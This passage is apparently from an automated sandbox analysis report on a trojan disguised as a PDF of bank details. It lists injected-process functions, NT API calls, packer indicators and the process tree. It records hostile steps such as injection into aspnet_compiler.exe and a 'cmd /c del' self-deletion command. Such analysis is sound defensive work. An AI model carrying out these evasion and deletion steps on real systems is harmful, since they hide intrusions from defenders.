          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00402D875_2_00402D87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041C7175_2_0041C717
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0188F9005_2_0188F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018A41205_2_018A4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0189B0905_2_0189B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B20A05_2_018B20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019520A85_2_019520A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019528EC5_2_019528EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019410025_2_01941002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0195E8245_2_0195E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018BEBB05_2_018BEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0194DBD25_2_0194DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019403DA5_2_019403DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01952B285_2_01952B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018AAB405_2_018AAB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019522AE5_2_019522AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0193FA2B5_2_0193FA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018B25815_2_018B2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_019525DD5_2_019525DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0189D5E05_2_0189D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01952D075_2_01952D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01880D205_2_01880D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01951D555_2_01951D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373AB4016_2_0373AB40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E2B2816_2_037E2B28
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D03DA16_2_037D03DA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DDBD216_2_037DDBD2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374EBB016_2_0374EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037CFA2B16_2_037CFA2B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E22AE16_2_037E22AE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373412016_2_03734120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0371F90016_2_0371F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037399BF16_2_037399BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0373A83016_2_0373A830
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037EE82416_2_037EE824
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037D100216_2_037D1002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E28EC16_2_037E28EC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037420A016_2_037420A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E20A816_2_037E20A8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372B09016_2_0372B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E1FF116_2_037E1FF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037EDFCE16_2_037EDFCE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03736E3016_2_03736E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DD61616_2_037DD616
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E2EF716_2_037E2EF7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E1D5516_2_037E1D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03710D2016_2_03710D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E2D0716_2_037E2D07
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372D5E016_2_0372D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037E25DD16_2_037E25DD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0374258116_2_03742581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037DD46616_2_037DD466
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0372841F16_2_0372841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_02932FB016_2_02932FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_02938C8016_2_02938C80
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0294CC0C16_2_0294CC0C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_02932D9016_2_02932D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_02932D8716_2_02932D87
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0371B150 appears 72 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_004185E0 NtCreateFile,5_2_004185E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00418690 NtReadFile,5_2_00418690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00418710 NtClose,5_2_00418710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_004187C0 NtAllocateVirtualMemory,5_2_004187C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041868A NtReadFile,5_2_0041868A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041870A NtClose,5_2_0041870A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C99A0 NtCreateSection,LdrInitializeThunk,5_2_018C99A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_018C9910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C98F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_018C98F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9840 NtDelayExecution,LdrInitializeThunk,5_2_018C9840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9860 NtQuerySystemInformation,LdrInitializeThunk,5_2_018C9860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_018C9A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9A20 NtResumeThread,LdrInitializeThunk,5_2_018C9A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9A50 NtCreateFile,LdrInitializeThunk,5_2_018C9A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C95D0 NtClose,LdrInitializeThunk,5_2_018C95D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9540 NtReadFile,LdrInitializeThunk,5_2_018C9540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9780 NtMapViewOfSection,LdrInitializeThunk,5_2_018C9780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C97A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_018C97A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9FE0 NtCreateMutant,LdrInitializeThunk,5_2_018C9FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9710 NtQueryInformationToken,LdrInitializeThunk,5_2_018C9710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C96E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_018C96E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_018C9660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C99D0 NtCreateProcessEx,5_2_018C99D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9950 NtQueueApcThread,5_2_018C9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C98A0 NtWriteVirtualMemory,5_2_018C98A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9820 NtEnumerateKey,5_2_018C9820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018CB040 NtSuspendThread,5_2_018CB040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018CA3B0 NtGetContextThread,5_2_018CA3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9B00 NtSetValueKey,5_2_018C9B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9A80 NtOpenDirectoryObject,5_2_018C9A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9A10 NtQuerySection,5_2_018C9A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C95F0 NtQueryInformationFile,5_2_018C95F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018C9520 NtWaitForSingleObject,5_2_018C9520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018CAD30 NtSetContextThread,5_2_018CAD30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759A50 NtCreateFile,LdrInitializeThunk,16_2_03759A50
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_03759910
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037599A0 NtCreateSection,LdrInitializeThunk,16_2_037599A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759860 NtQuerySystemInformation,LdrInitializeThunk,16_2_03759860
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759840 NtDelayExecution,LdrInitializeThunk,16_2_03759840
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759710 NtQueryInformationToken,LdrInitializeThunk,16_2_03759710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759FE0 NtCreateMutant,LdrInitializeThunk,16_2_03759FE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759780 NtMapViewOfSection,LdrInitializeThunk,16_2_03759780
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_03759660
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759650 NtQueryValueKey,LdrInitializeThunk,16_2_03759650
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037596E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_037596E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037596D0 NtCreateKey,LdrInitializeThunk,16_2_037596D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759540 NtReadFile,LdrInitializeThunk,16_2_03759540
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037595D0 NtClose,LdrInitializeThunk,16_2_037595D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759B00 NtSetValueKey,16_2_03759B00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0375A3B0 NtGetContextThread,16_2_0375A3B0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759A20 NtResumeThread,16_2_03759A20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759A10 NtQuerySection,16_2_03759A10
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759A00 NtProtectVirtualMemory,16_2_03759A00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759A80 NtOpenDirectoryObject,16_2_03759A80
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759950 NtQueueApcThread,16_2_03759950
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037599D0 NtCreateProcessEx,16_2_037599D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0375B040 NtSuspendThread,16_2_0375B040
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759820 NtEnumerateKey,16_2_03759820
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037598F0 NtReadVirtualMemory,16_2_037598F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037598A0 NtWriteVirtualMemory,16_2_037598A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0375A770 NtOpenThread,16_2_0375A770
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759770 NtSetInformationFile,16_2_03759770
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759760 NtOpenProcess,16_2_03759760
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759730 NtQueryVirtualMemory,16_2_03759730
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0375A710 NtOpenProcessToken,16_2_0375A710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037597A0 NtUnmapViewOfSection,16_2_037597A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759670 NtQueryInformationProcess,16_2_03759670
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759610 NtEnumerateValueKey,16_2_03759610
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759560 NtWriteFile,16_2_03759560
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0375AD30 NtSetContextThread,16_2_0375AD30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_03759520 NtWaitForSingleObject,16_2_03759520
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_037595F0 NtQueryInformationFile,16_2_037595F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_02948690 NtReadFile,16_2_02948690
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_029487C0 NtAllocateVirtualMemory,16_2_029487C0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_02948710 NtClose,16_2_02948710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_029485E0 NtCreateFile,16_2_029485E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0294868A NtReadFile,16_2_0294868A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0294870A NtClose,16_2_0294870A
          Source: BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.262557982.0000000000CC6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVXCSGDFD.exe4 vs BANK DETAILS-25012022-971332pdf.exe
          Source: BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.262716793.00000000011B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs BANK DETAILS-25012022-971332pdf.exe
          Source: BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.262683750.0000000001180000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename vs BANK DETAILS-25012022-971332pdf.exe
          Source: BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.263299926.00000000030E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs BANK DETAILS-25012022-971332pdf.exe
          Source: BANK DETAILS-25012022-971332pdf.exeBinary or memory string: OriginalFilenameVXCSGDFD.exe4 vs BANK DETAILS-25012022-971332pdf.exe
          Source: BANK DETAILS-25012022-971332pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: BANK DETAILS-25012022-971332pdf.exeStatic PE information: invalid certificate
          Source: BANK DETAILS-25012022-971332pdf.exeVirustotal: Detection: 50%
          Source: BANK DETAILS-25012022-971332pdf.exeReversingLabs: Detection: 20%
          Source: BANK DETAILS-25012022-971332pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe "C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe"
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BANK DETAILS-25012022-971332pdf.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@14/6
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6516:120:WilError_01
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: BANK DETAILS-25012022-971332pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: BANK DETAILS-25012022-971332pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: BANK DETAILS-25012022-971332pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: c:\Users\VICTOR\source\repos\VXCSGDFD\VXCSGDFD\obj\Debug\VXCSGDFD.pdb source: BANK DETAILS-25012022-971332pdf.exe
          Source: Binary string: c:\Users\VICTOR\source\repos\VXCSGDFD\VXCSGDFD\obj\Debug\VXCSGDFD.pdb|E source: BANK DETAILS-25012022-971332pdf.exe
          Source: Binary string: ????????????.pdb source: BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.262683750.0000000001180000.00000004.08000000.00040000.00000000.sdmp, BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.263299926.00000000030E3000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: WWAHost.pdb source: aspnet_compiler.exe, 00000005.00000002.343223890.00000000036E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: aspnet_compiler.exe, 00000005.00000002.343223890.00000000036E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000005.00000002.342710384.000000000197F000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000005.00000002.342710384.000000000197F000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: aspnet_compiler.pdb source: WWAHost.exe, 00000010.00000002.518661760.0000000003C27000.00000004.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeUnpacked PE file: 1.2.BANK DETAILS-25012022-971332pdf.exe.cc0000.0.unpack
          .NET source code contains potential unpacker
          Source: BANK DETAILS-25012022-971332pdf.exe, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.BANK DETAILS-25012022-971332pdf.exe.cc0000.0.unpack, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.BANK DETAILS-25012022-971332pdf.exe.cc0000.0.unpack, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041B822 push eax; ret 5_2_0041B828
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041B82B push eax; ret 5_2_0041B892
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041B88C push eax; ret 5_2_0041B892
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00406154 push edi; iretd 5_2_00406155
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00418A41 pushfd ; iretd 5_2_00418A4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041629B push esi; iretd 5_2_0041629C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00415B26 push ss; ret 5_2_00415B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00415D08 push ds; ret 5_2_00415D14
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041AF62 push ebp; ret 5_2_0041AF67
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00415FCF push ecx; iretd 5_2_00415FD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041B7D5 push eax; ret 5_2_0041B828
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_018DD0D1 push ecx; ret 5_2_018DD0E4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0376D0D1 push ecx; ret 16_2_0376D0E4
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0294629B push esi; iretd 16_2_0294629C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_02948A41 pushfd ; iretd 16_2_02948A4C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_02945B26 push ss; ret 16_2_02945B28
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0294B88C push eax; ret 16_2_0294B892
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0294B822 push eax; ret 16_2_0294B828
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0294B82B push eax; ret 16_2_0294B892
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_02936154 push edi; iretd 16_2_02936155
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0294B7D5 push eax; ret 16_2_0294B828
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_02945FCF push ecx; iretd 16_2_02945FD0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0294AF62 push ebp; ret 16_2_0294AF67
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0294C482 push edi; ret 16_2_0294C484
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_0294BC64 push ss; ret 16_2_0294BC65
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 16_2_02945D08 push ds; ret 16_2_02945D14
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
